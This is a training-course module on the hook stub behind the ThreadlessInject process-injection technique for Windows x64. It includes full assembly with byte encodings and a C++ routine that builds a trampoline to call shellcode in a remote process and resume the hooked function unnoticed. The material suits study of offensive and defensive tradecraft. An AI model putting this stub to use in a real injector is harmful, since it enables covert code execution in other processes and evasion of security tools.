Module 5: The Hook Stub Architecture
The trampoline: save context, call payload, restore state, resume original function.
The Heart of ThreadlessInject
The hook stub is the most critical piece of code in the entire technique. It is what actually executes in the target process when the hooked function is called. The stub must (1) save the entire CPU register state so the shellcode doesn't corrupt the calling thread's context, (2) call the shellcode, (3) restore the register state perfectly, (4) execute the original overwritten prologue bytes, and (5) jump back to the original function to resume normal execution. If any of these steps fails, the target process crashes.
Register Preservation: The x64 Calling Convention
On Windows x64, the calling convention uses registers RCX, RDX, R8, and R9 for the first four integer/pointer arguments, with XMM0 through XMM3 for floating-point arguments. The volatile registers (RAX, RCX, RDX, R8-R11) can be modified by called functions, while nonvolatile registers (RBX, RBP, RDI, RSI, R12-R15) must be preserved by callees.
However, our hook stub is not a normal function call — it is an unexpected detour that happens when a thread is about to execute a function. The thread's register state at the moment of the hook is meaningful to the calling code. We must preserve the volatile registers because the caller expects to have its argument registers intact when the original function finally executes.
| Register Type | Registers | Must Save? | Why |
|---|---|---|---|
| General Purpose (volatile) | RAX, RCX, RDX, R8-R11 | Yes | Contain caller's arguments/state |
| General Purpose (nonvolatile) | RBX, RBP, RDI, RSI, R12-R15 | Optional | The original function is responsible for preserving these per calling convention |
| Stack Pointer | RSP | Implicitly | Balanced by push/pop pairs |
| Flags | RFLAGS | Ideally yes | Conditional jumps depend on flags |
| SIMD | XMM0-XMM5 | Ideally yes | Floating-point arguments |
Actual Implementation: Volatile Registers Only
The actual ThreadlessInject loader stub saves only the volatile registers: RAX, RCX, RDX, R8, R9, R10, R11 (7 registers). It does not save nonvolatile registers (RBX, RBP, RDI, RSI, R12-R15) because the hook fires at the function entry point before the original function has used its arguments — the original function itself is responsible for preserving nonvolatile registers per the x64 calling convention. The comprehensive approach shown below (saving all registers) is more defensive and is included here for pedagogical completeness.
The Hook Stub Assembly
Here is the hook stub that ThreadlessInject constructs. It is built as raw machine code bytes (position-independent) and written into the remote process. Every byte is carefully chosen:
x86-64 ASM; ThreadlessInject Hook Stub
; This code is written into the remote process and executed when
; a thread calls the hooked function
hook_stub:
; === PHASE 1: Save all registers ===
push rax ; 50
push rcx ; 51
push rdx ; 52
push rbx ; 53
push rbp ; 55
push rsi ; 56
push rdi ; 57
push r8 ; 41 50
push r9 ; 41 51
push r10 ; 41 52
push r11 ; 41 53
push r12 ; 41 54
push r13 ; 41 55
push r14 ; 41 56
push r15 ; 41 57
pushfq ; 9C (save RFLAGS)
; === PHASE 2: Align stack to 16 bytes (x64 ABI requirement) ===
mov rbp, rsp ; 48 89 E5 - save current stack pointer
and rsp, 0xFFFFFFF0 ; 48 83 E4 F0 - align to 16-byte boundary
sub rsp, 0x20 ; 48 83 EC 20 - allocate shadow space
; === PHASE 3: Call shellcode ===
; The shellcode address is embedded in the stub at a known offset
mov rax, 0xDEADBEEFCAFEBABE ; 48 B8 [8-byte shellcode address]
call rax ; FF D0
; === PHASE 4: Restore stack and all registers ===
mov rsp, rbp ; 48 89 EC - restore stack pointer
popfq ; 9D (restore RFLAGS)
pop r15 ; 41 5F
pop r14 ; 41 5E
pop r13 ; 41 5D
pop r12 ; 41 5C
pop r11 ; 41 5B
pop r10 ; 41 5A
pop r9 ; 41 59
pop r8 ; 41 58
pop rdi ; 5F
pop rsi ; 5E
pop rbp ; 5D
pop rbx ; 5B
pop rdx ; 5A
pop rcx ; 59
pop rax ; 58
; === PHASE 5: Execute original bytes (saved from hooked function) ===
; [14 bytes of original prologue instructions are placed here]
; === PHASE 6: Jump back to hooked function + 14 ===
jmp [rip+0] ; FF 25 00 00 00 00
dq original_func+14 ; [8-byte address of instruction after our overwrite]
Position-Independent Construction
Notice that the hook stub uses only relative addressing (push/pop, mov reg, imm64, call reg, and jmp [rip+0]). It never references absolute addresses through RIP-relative loads that depend on the stub's position. The only absolute addresses are the shellcode pointer (embedded as an immediate in the MOV RAX) and the jump-back target (embedded after the JMP [RIP+0]). These are patched in by the injector before writing the stub to the remote process.
Building the Stub Programmatically
ThreadlessInject constructs the hook stub as a byte array in the injector process, patches in the correct addresses, and then writes the completed stub to the remote process:
C++// Building the hook stub as a byte array
// Each section corresponds to a phase from the assembly above
void BuildHookStub(BYTE* stub, UINT64 shellcodeAddr,
BYTE* origBytes, UINT64 origFuncAddr) {
int offset = 0;
// Phase 1: Push all general-purpose registers + flags
BYTE saveRegs[] = {
0x50, // push rax
0x51, // push rcx
0x52, // push rdx
0x53, // push rbx
0x55, // push rbp
0x56, // push rsi
0x57, // push rdi
0x41, 0x50, // push r8
0x41, 0x51, // push r9
0x41, 0x52, // push r10
0x41, 0x53, // push r11
0x41, 0x54, // push r12
0x41, 0x55, // push r13
0x41, 0x56, // push r14
0x41, 0x57, // push r15
0x9C // pushfq
};
memcpy(stub + offset, saveRegs, sizeof(saveRegs));
offset += sizeof(saveRegs);
// Phase 2: Align stack + shadow space
BYTE alignStack[] = {
0x48, 0x89, 0xE5, // mov rbp, rsp
0x48, 0x83, 0xE4, 0xF0, // and rsp, -16
0x48, 0x83, 0xEC, 0x20 // sub rsp, 0x20
};
memcpy(stub + offset, alignStack, sizeof(alignStack));
offset += sizeof(alignStack);
// Phase 3: Load shellcode address and call it
stub[offset++] = 0x48; // REX.W prefix
stub[offset++] = 0xB8; // mov rax, imm64
*(UINT64*)(stub + offset) = shellcodeAddr; // Patch shellcode address
offset += 8;
stub[offset++] = 0xFF; // call rax
stub[offset++] = 0xD0;
// Phase 4: Restore stack + pop all registers + flags
BYTE restoreRegs[] = {
0x48, 0x89, 0xEC, // mov rsp, rbp
0x9D, // popfq
0x41, 0x5F, // pop r15
0x41, 0x5E, // pop r14
0x41, 0x5D, // pop r13
0x41, 0x5C, // pop r12
0x41, 0x5B, // pop r11
0x41, 0x5A, // pop r10
0x41, 0x59, // pop r9
0x41, 0x58, // pop r8
0x5F, // pop rdi
0x5E, // pop rsi
0x5D, // pop rbp
0x5B, // pop rbx
0x5A, // pop rdx
0x59, // pop rcx
0x58 // pop rax
};
memcpy(stub + offset, restoreRegs, sizeof(restoreRegs));
offset += sizeof(restoreRegs);
// Phase 5: Execute the saved original bytes
memcpy(stub + offset, origBytes, 14);
offset += 14;
// Phase 6: Jump back to original function + 14
stub[offset++] = 0xFF; // jmp [rip+0]
stub[offset++] = 0x25;
*(DWORD*)(stub + offset) = 0; // RIP-relative offset = 0
offset += 4;
*(UINT64*)(stub + offset) = origFuncAddr + 14; // Jump target
offset += 8;
}
Stack Alignment: A Critical Detail
The x64 Windows ABI requires the stack to be 16-byte aligned at the point of a CALL instruction. After our series of pushes, the stack pointer is not guaranteed to be aligned (it depends on how many pushes we did and the alignment when we entered). The AND RSP, -16 instruction forces alignment, and we save the original RSP in RBP so we can restore it exactly after the shellcode returns.
Hook Stub Execution Flow
hooked func
hook stub
registers
shellcode
registers
bytes + JMP
Shadow Space Requirement
The sub rsp, 0x20 instruction allocates 32 bytes of "shadow space" (also called "home space" or "spill space") that the x64 calling convention requires the caller to provide. Even if the shellcode doesn't use it, many Windows API functions internally expect this space to be present. Failing to allocate it can cause the shellcode (or any function it calls) to corrupt the stack when it tries to spill register arguments to the shadow area.
Why the Stub Must Be Position-Independent
The hook stub is compiled as raw bytes and placed at an arbitrary address in the remote process. It cannot contain relocations or absolute address references to itself, because we don't know the final address until we allocate memory in the remote process. All control flow within the stub uses relative instructions (push, pop, call via register), and the two absolute addresses (shellcode entry and jump-back target) are patched as immediate values before the stub is written.
This is the same constraint that shellcode faces: you must be able to run at any address without modification. The difference is that our stub is not standalone shellcode — it's a wrapper that calls standalone shellcode and then transparently resumes the hooked function.
Correctness Guarantee
If the hook stub correctly saves and restores all registers, correctly executes the original overwritten bytes, and correctly jumps back to the right address, then the calling thread is completely unaware that the hook existed. The hooked function behaves identically to the unhooked version from the caller's perspective, except for a brief delay (the time it takes to run the shellcode). This transparency is what makes ThreadlessInject so powerful: the target process continues running normally after the injection.
Pop Quiz: Hook Stub Architecture
Q1: Why does the hook stub save volatile registers (RAX, RCX, RDX, R8-R11) even though the calling convention says callees can modify them?
Q2: What is the purpose of "AND RSP, -16" in the hook stub?
Q3: How is the shellcode address embedded in the hook stub?